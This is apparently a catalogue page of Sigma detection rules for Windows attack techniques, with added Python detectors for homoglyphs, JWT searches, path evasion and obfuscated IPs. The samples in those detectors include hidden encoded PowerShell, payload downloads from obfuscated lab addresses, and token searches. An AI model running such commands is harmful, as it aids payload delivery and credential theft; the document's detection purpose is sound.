Sigma Rules
1,473 rules found
Potential Amazon SSM Agent Hijacking
Detects potential Amazon SSM agent hijack attempts as outlined in the Mitiga research report.
Start of NT Virtual DOS Machine
Ntvdm.exe allows the execution of 16-bit Windows applications on 32-bit Windows operating systems, as well as the execution of both 16-bit and 32-bit DOS applications.
User Added to Local Administrators Group
Detects addition of users to the local administrator group via "Net" or "Add-LocalGroupMember".
Execute From Alternate Data Streams
Detects execution from an Alternate Data Stream (ADS). Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection.
Always Install Elevated Windows Installer
Detects the Windows Installer service (msiexec.exe) trying to install MSI packages with SYSTEM privileges.
Potentially Suspicious Windows App Activity
Detects potentially suspicious child processes of applications launched from inside the WindowsApps directory. This could be a sign of a rogue ".appx" package installation/execution.
Arbitrary Shell Command Execution Via Settingcontent-Ms
The .SettingContent-ms file type was introduced in Windows 10 and allows a user to create "shortcuts" to various Windows 10 setting pages. These files are simply XML and contain paths to various Windows 10 settings binaries.
Automated Collection Command Prompt
Once established within a system or network, an adversary may use automated techniques for collecting internal data.
Potential Suspicious Browser Launch From Document Reader Process
Detects when a browser process or browser tab is launched from an application that handles document files, such as Adobe or Microsoft Office products, and connects to a web application over HTTP(S). This could indicate a possible phishing attempt.
Potential Commandline Obfuscation Using Escape Characters
Detects potential command-line obfuscation using known escape characters.
Suspicious Usage of For Loop with Recursive Directory Search in CMD
Detects suspicious usage of the cmd.exe 'for /f' loop combined with the 'tokens=' parameter and a recursive directory listing. This pattern may indicate an attempt to discover and execute system binaries dynamically, for example powershell, a technique sometimes used by attackers to evade detection. This behavior has been observed in various malicious lnk files.
Potential Command Line Path Traversal Evasion Attempt
Detects potential evasion or obfuscation attempts using bogus path traversal via the command line.
Potential Browser Data Stealing
Adversaries may acquire credentials from web browsers by reading files specific to the target browser. Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future. Web browsers typically store the credentials in an encrypted format within a credential store.
Copy From Or To Admin Share Or Sysvol Folder
Detects a copy command or a copy utility execution to or from an Admin share or remote
Suspicious Copy From or To System Directory
Detects a suspicious copy operation that tries to copy a program from system (System32, SysWOW64, WinSxS) directories to another on disk. Often used to move LOLBINs such as 'certutil' or 'desktopimgdownldr' to a different location with a different name in order to bypass detections based on locations.
Always Install Elevated MSI Spawned Cmd And Powershell
Detects the Windows Installer service (msiexec.exe) spawning "cmd" or "powershell".
Suspicious Electron Application Child Processes
Detects suspicious child processes of electron apps (teams, discord, slack, etc.). This could be a potential sign of ".asar" file tampering (See reference section for more information) or binary execution proxy through specific CLI arguments (see related rule)
Potentially Suspicious Electron Application CommandLine
Detects potentially suspicious CommandLine of electron apps (teams, discord, slack, etc.). This could be a sign of abuse to proxy execution through a signed binary.
Elevated System Shell Spawned From Uncommon Parent Location
Detects when a shell program such as the Windows command prompt or PowerShell is launched with system privileges from an uncommon parent location.
Hidden Powershell in Link File Pattern
Detects events that appear when a user clicks on a shortcut (.lnk) file with a PowerShell command in it.
Potentially Suspicious EventLog Recon Activity Using Log Query Utilities
Detects execution of different log query utilities and commands to search and dump the content of specific event logs or look for specific event IDs. This technique is used by threat actors in order to extract sensitive information from event logs such as usernames, IP addresses, hostnames, etc.
Suspicious File Characteristics Due to Missing Fields
Detects executables in the Downloads folder without the FileVersion, Description, Product or Company fields, likely created with py2exe.
Potential Hidden Directory Creation Via NTFS INDEX_ALLOCATION Stream - CLI
Detects a command line containing a reference to the "::$index_allocation" stream, which can be used as a technique to prevent access to folders or files from tooling such as "explorer.exe" or "powershell.exe".
Writing Of Malicious Files To The Fonts Folder
Monitors for possible malicious files hidden in the C:\Windows\Fonts\ location. This folder does not require administrator privileges to write to or execute from.
Potential Homoglyph Attack Using Lookalike Characters
Detects the presence of Unicode characters which are homoglyphs, or identical in appearance, to ASCII letter characters. This is used as an obfuscation and masquerading technique. Only "perfect" homoglyphs are included; these are characters that are indistinguishable from ASCII characters and thus make excellent candidates for homoglyph attacks.
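As an added example (Python, not part of the rule set listed here), the following shows how a "perfect homoglyph" check can be run over constructed command lines, and how folding the lookalikes back to ASCII lets an ordinary substring match such as "powershell" work again. The homoglyph table is a hand-picked subset of Cyrillic and Greek letters that render identically to ASCII letters in common fonts; the rule's own list is assumed to be longer.

```python
"""Flag 'perfect' Unicode homoglyphs of ASCII letters in process command lines."""
import unicodedata

# Constructed subset of Cyrillic/Greek letters that are visually identical to
# ASCII letters in most fonts (assumption: the real rule list is longer).
PERFECT_HOMOGLYPHS = {
    "\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0440": "p", "\u0441": "c",
    "\u0443": "y", "\u0445": "x", "\u0456": "i", "\u0458": "j", "\u0455": "s",
    "\u0410": "A", "\u0412": "B", "\u0415": "E", "\u041a": "K", "\u041c": "M",
    "\u041d": "H", "\u041e": "O", "\u0420": "P", "\u0421": "C", "\u0422": "T",
    "\u0425": "X", "\u03bf": "o", "\u039f": "O",
}


def find_homoglyphs(text):
    """Return (position, char, 'U+XXXX', ascii_lookalike) for each homoglyph."""
    hits = []
    for pos, ch in enumerate(text):
        if ch in PERFECT_HOMOGLYPHS:
            hits.append((pos, ch, f"U+{ord(ch):04X}", PERFECT_HOMOGLYPHS[ch]))
    return hits


def fold_homoglyphs(text):
    """Replace each perfect homoglyph with its ASCII twin so ordinary string
    matching (e.g. looking for 'powershell') works on the folded value."""
    return "".join(PERFECT_HOMOGLYPHS.get(ch, ch) for ch in text)


# Constructed sample command lines: the second uses a Cyrillic 'о' (U+043E) so a
# naive search for 'powershell' misses it; the third carries a genuine accented
# letter, which is not a homoglyph and must not fire.
SAMPLE_COMMANDLINES = [
    "powershell.exe -nop -w hidden -enc SQBFAFgA",
    "p\u043ewershell.exe -nop -w hidden -enc SQBFAFgA",
    "notepad.exe C:\\Users\\ren\u00e9\\notes.txt",
]


def scan(commandlines):
    """Return the indexes of command lines containing at least one homoglyph."""
    return [i for i, cl in enumerate(commandlines) if find_homoglyphs(cl)]


if __name__ == "__main__":
    for i in scan(SAMPLE_COMMANDLINES):
        cl = SAMPLE_COMMANDLINES[i]
        for pos, ch, cp, twin in find_homoglyphs(cl):
            print(f"[{i}] offset {pos}: {cp} {unicodedata.name(ch)} looks like '{twin}'")
        print(f"    folded: {fold_homoglyphs(cl)}")
```

Accented letters such as "é" are deliberately absent from the table: they are visibly different from ASCII and appear in legitimate user names and paths, so including them would only add noise.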
Potentially Suspicious Inline JavaScript Execution via NodeJS Binary
Detects potentially suspicious inline JavaScript execution using Node.js with specific keywords in the command line.
Potentially Suspicious JWT Token Search Via CLI
Detects potentially suspicious search for JWT tokens via CLI by looking for the string "eyJ0eX" or "eyJhbG". JWT tokens are often used for access-tokens across various applications and services like Microsoft 365, Azure, AWS, Google Cloud, and others. Threat actors may search for these tokens to steal them for lateral movement or privilege escalation.
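The two magic strings are not arbitrary: a compact JWT begins with the base64url encoding of its JSON header, and a header that starts with `{"typ` or `{"alg` always encodes to the same first six characters. The added Python below (an illustration, not the rule's own logic) derives both prefixes from the JSON and then runs the search over constructed command lines, decoding the header when a complete token is present so an analyst can tell a search pattern from a token that is merely in use.

```python
"""Why 'eyJ0eX' and 'eyJhbG' identify JWTs, and a scan for command lines that search for them."""
import base64
import json
import re


def b64url_encode(data):
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(text):
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def header_prefix(first_key):
    """A JOSE header starting with '{"<first_key>"' has a fixed first 6 base64url
    characters, because the first 4.5 bytes of the header never change."""
    header = json.dumps({first_key: "x"}, separators=(",", ":")).encode()
    return b64url_encode(header)[:6]


# The two prefixes the rule looks for, derived rather than hard-coded.
JWT_PREFIXES = (header_prefix("typ"), header_prefix("alg"))  # ('eyJ0eX', 'eyJhbG')

# A complete compact-serialised token: header.payload.signature
JWT_TOKEN = re.compile(r"eyJ[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+\.[A-Za-z0-9_-]*")


def decode_header(token):
    """Return the JOSE header of a compact-serialised JWT as a dict."""
    return json.loads(b64url_decode(token.split(".")[0]))


def scan(commandlines):
    """Return (index, matched_prefix, decoded_header_or_None) for each command
    line containing a JWT prefix. A header is only decoded when a full token is
    present; None therefore means 'someone is searching for tokens'."""
    hits = []
    for i, cl in enumerate(commandlines):
        for prefix in JWT_PREFIXES:
            if prefix in cl:
                m = JWT_TOKEN.search(cl)
                hits.append((i, prefix, decode_header(m.group(0)) if m else None))
                break
    return hits


# Constructed sample command lines (not real telemetry).
SAMPLE_COMMANDLINES = [
    'findstr /s /i "eyJhbG" C:\\Users\\*.log',
    "Select-String -Path C:\\inetpub\\logs\\*.log -Pattern eyJ0eX",
    'findstr /s /i "password" C:\\Users\\*.txt',
    'curl -H "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.e30.c2ln" https://api.example.test/',
]


if __name__ == "__main__":
    for i, prefix, header in scan(SAMPLE_COMMANDLINES):
        kind = "token in use" if header else "token search"
        print(f"[{i}] {prefix}: {kind} {header or ''}")
```

The last sample shows the main false-positive class for a pure substring match: any tool that passes a bearer token on its command line contains the same prefix. Decoding the header does not make that benign, but it separates "searching for tokens" from "using one", which is what the triage needs.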
LOLBIN Execution From Abnormal Drive
Detects LOLBINs executing from an abnormal or uncommon drive such as a mounted ISO.
Potential File Download Via MS-AppInstaller Protocol Handler
Detects usage of the "ms-appinstaller" protocol handler via command line to potentially download arbitrary files via AppInstaller.EXE. The downloaded files are temporarily stored in ":\Users\%username%\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\INetCache\<RANDOM-8-CHAR-DIRECTORY>".
Suspicious Scan Loop Network
Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for lateral movement from the current system.
Potential Network Sniffing Activity Using Network Tools
Detects potential network sniffing via use of network tools such as "tshark", "windump". Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
Process Launched Without Image Name
Detects the use of processes with no image name (just ".exe"), which can be used to evade image-based detections.
Execution of Suspicious File Type Extension
Detects whether the image specified in a process creation event doesn't refer to an ".exe" (or other known executable extension) file. This can be caused by process ghosting or other unorthodox methods to start a process. This rule might require some initial baselining to align with some third party tooling in the user environment.
Use Short Name Path in Image
Detects use of a Windows 8.3 short name in the image path, which could be used as a method to avoid image-based detection.
Use NTFS Short Name in Command Line
Detects use of an NTFS 8.3 short name in the command line, which could be used as a method to avoid command-line detection.
Use NTFS Short Name in Image
Detects use of an NTFS 8.3 short name in the image path, which could be used as a method to avoid image-based detection.
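The path-traversal, missing-image-name, suspicious-extension and 8.3 short-name rules above all target the same weakness: a detection that compares the literal `Image` or `CommandLine` string against `C:\Windows\System32\cmd.exe` is defeated by `C:\Windows\System32\..\System32\cmd.exe`, `C:\PROGRA~1\...`, an image called just `.exe`, or a binary renamed to `.dat`. The added Python below (an example written for this page, not code from the rule set) runs these checks together over constructed process-creation events. The field names follow Sysmon and Sigma (`Image`, `CommandLine`); the list of "known executable" extensions is an assumption for the example and would need baselining in a real environment.

```python
"""Checks on Image/CommandLine of a process-creation event for path tricks that
defeat naive string matching: bare '.exe' image names, non-executable
extensions, NTFS 8.3 short names and bogus '..' traversal."""
import ntpath
import re

# Assumption for this example: extensions treated as "known executable".
EXECUTABLE_EXTENSIONS = {".exe", ".com", ".scr", ".tmp"}

# One path component in 8.3 form: up to 6 chars, '~', digits, optional 3-char extension.
SHORT_NAME = re.compile(r"^[^.\\]{1,6}~\d+(?:\.[^.\\]{1,3})?$")

# Drive-letter paths inside a command line (stops at whitespace or quotes).
WIN_PATH = re.compile(r"""[A-Za-z]:\\[^\s"']+""")


def has_short_name(text):
    """True if any backslash/space/quote-separated component is an 8.3 name."""
    return any(SHORT_NAME.match(p) for p in re.split(r"""[\\\s"']+""", text))


def traversal_targets(text):
    """Return (literal, normalised) for each drive-letter path in text that
    uses '..' segments to disguise where it really points."""
    return [(p, ntpath.normpath(p)) for p in WIN_PATH.findall(text) if "\\..\\" in p]


def analyze(event):
    """Return a list of human-readable findings for one process-creation event."""
    findings = []
    image, cmdline = event["Image"], event.get("CommandLine", "")
    base = ntpath.basename(image)
    if base.lower() == ".exe":
        findings.append("image has no file name (bare .exe)")
    else:
        ext = ntpath.splitext(base)[1].lower()
        if ext not in EXECUTABLE_EXTENSIONS:
            findings.append(f"image extension {ext or '<none>'} is not a known executable type")
    if has_short_name(image):
        findings.append("8.3 short name in image path")
    if has_short_name(cmdline):
        findings.append("8.3 short name in command line")
    for literal, real in traversal_targets(image + " " + cmdline):
        findings.append(f"path traversal: {literal} -> {real}")
    return findings


# Constructed sample events (not real telemetry); the first is benign.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r"notepad.exe C:\Users\alice\notes.txt"},
    {"Image": r"C:\Users\Public\.exe", "CommandLine": r"C:\Users\Public\.exe"},
    {"Image": r"C:\Users\alice\AppData\Local\Temp\update.dat",
     "CommandLine": r"C:\Users\alice\AppData\Local\Temp\update.dat"},
    {"Image": r"C:\PROGRA~1\INTERN~1\iexplore.exe", "CommandLine": "iexplore.exe"},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c C:\PROGRA~2\MICROS~1\Edge\msedge.exe"},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c C:\Windows\System32\..\..\Windows\System32\calc.exe"},
]


if __name__ == "__main__":
    for i, ev in enumerate(SAMPLE_EVENTS):
        for f in analyze(ev):
            print(f"[{i}] {ev['Image']}: {f}")
```

Windows generates 8.3 names automatically, so `C:\PROGRA~1` also shows up in legacy installers and batch scripts; the short-name checks are a hunting signal to baseline rather than a verdict. The traversal check reports the normalised path so the analyst sees the binary that actually ran.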
Obfuscated IP Download Activity
Detects use of an encoded/obfuscated version of an IP address (hex, octal, etc.) in a URL combined with a download command.
Obfuscated IP Via CLI
Detects usage of an encoded/obfuscated version of an IP address (hex, octal, etc.) via the command line.
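Both obfuscated-IP rules rely on the fact that the Windows `inet_addr()` parser (and therefore most download utilities) accepts hexadecimal and octal components, fewer than four dotted parts, and a bare 32-bit integer, so `http://0x7f000001/`, `http://0177.0.0.1/` and `http://2130706433/` all reach 127.0.0.1. The added Python below (an example for this page, not the rules' own logic) normalises every URL host on a command line to its canonical dotted quad and flags the ones that were not written that way; the sample command lines are constructed.

```python
"""Normalise the IP-address spellings inet_addr() accepts and flag obfuscated
ones inside URLs on a command line."""
import re

URL_HOST = re.compile(r"""(?i)\b(?:https?|ftp)://([^/\s:@"']+)""")


def _parse_part(part):
    """Return (value, is_obfuscated) for one dotted component.
    Hex (0x..) and leading-zero octal are accepted just as inet_addr does."""
    p = part.lower()
    if p.startswith("0x"):
        return int(p[2:], 16), True
    if p.isdigit():
        if len(p) > 1 and p[0] == "0":
            return int(p, 8), True  # ValueError on digits 8/9, caught by caller
        return int(p, 10), False
    raise ValueError(part)


def normalize_ip(host):
    """Return (dotted_quad, is_obfuscated), or None if host is not an
    inet_addr-style address. With fewer than four parts the last part fills
    the remaining bits: a.b.c -> c is 16-bit, a.b -> b is 24-bit,
    a -> a is a 32-bit dword."""
    parts = host.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    try:
        parsed = [_parse_part(p) for p in parts]
    except ValueError:
        return None
    obfuscated = len(parts) < 4 or any(flag for _, flag in parsed)
    widths = [8] * (len(parts) - 1) + [32 - 8 * (len(parts) - 1)]
    value = 0
    for (v, _), width in zip(parsed, widths):
        if v >= 1 << width:  # component too large for its slot: not an address
            return None
        value = (value << width) | v
    quad = ".".join(str((value >> shift) & 0xFF) for shift in (24, 16, 8, 0))
    return quad, obfuscated


def find_obfuscated_ips(commandline):
    """Return (raw_host, dotted_quad) for each URL host that is an IP in non-canonical form."""
    hits = []
    for host in URL_HOST.findall(commandline):
        result = normalize_ip(host)
        if result and result[1]:
            hits.append((host, result[0]))
    return hits


def scan(commandlines):
    """Return (index, raw_host, dotted_quad) across a list of command lines."""
    return [(i, *hit) for i, cl in enumerate(commandlines) for hit in find_obfuscated_ips(cl)]


# Constructed sample command lines; every obfuscated host decodes to a lab address.
SAMPLE_COMMANDLINES = [
    'powershell -c "iwr http://0x7f000001/a.ps1 -o a.ps1"',   # hex dword
    "curl http://0177.0.0.1/stage2 -o s2.exe",                 # octal first octet
    "certutil -urlcache -f http://2130706433/payload.exe p.exe",  # decimal dword
    "curl -s http://0xc0.0250.1.20/x",                         # mixed hex/octal
    "bitsadmin /transfer j http://192.168.276/f.zip C:\\f.zip",   # three parts, 16-bit tail
    "bitsadmin /transfer j http://192.168.1.20/f.zip C:\\f.zip",  # canonical, not flagged
    "curl https://example.test/ok",                            # hostname, not an IP
]


if __name__ == "__main__":
    for i, raw, canonical in scan(SAMPLE_COMMANDLINES):
        print(f"[{i}] {raw} -> {canonical}")
```

Restricting the check to URL hosts keeps plain integers elsewhere on the command line (ports, timeouts, PIDs) from being misread as dword addresses; a rule that matched any bare number would be unusable.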
Private Keys Reconnaissance Via CommandLine Tools
Adversaries may search for private key certificate files on compromised systems for insecurely stored credentials.
Suspicious RunAs-Like Flag Combination
Detects suspicious command-line flags that let the user set a target user and command, as seen e.g. in PsExec-like tools.
Recon Information for Export with Command Prompt
Once established within a system or network, an adversary may use automated techniques for collecting internal data.
Registry Modification of MS-settings Protocol Handler
Detects registry modifications to the 'ms-settings' protocol handler, which is frequently targeted for UAC bypass or persistence. Attackers can modify this registry to execute malicious code with elevated privileges by hijacking the command execution path.
Potential Remote Desktop Tunneling
Detects potential use of an SSH utility to establish RDP over a reverse SSH Tunnel. This can be used by attackers to enable routing of network packets that would otherwise not reach their intended destination.
Shadow Copies Creation Using Operating Systems Utilities
Detects shadow copy creation using operating system utilities, which may indicate an attempt at credential access.
Process Creation Using Sysnative Folder
Detects process creation events that use the Sysnative folder (common for Cobalt Strike spawns).
Suspicious SYSVOL Domain Group Policy Access
Detects Access to Domain Group Policies stored in SYSVOL
Malicious PE Execution by Microsoft Visual Studio Debugger
The Microsoft Visual Studio Just-In-Time Debugger "vsjitdebugger.exe" has an option to launch a specified executable and attach a debugger. Adversaries may use this option to execute malicious code through a signed, verified binary. The debugger is installed alongside the Microsoft Visual Studio package.
Suspicious Userinit Child Process
Detects a suspicious child process of userinit.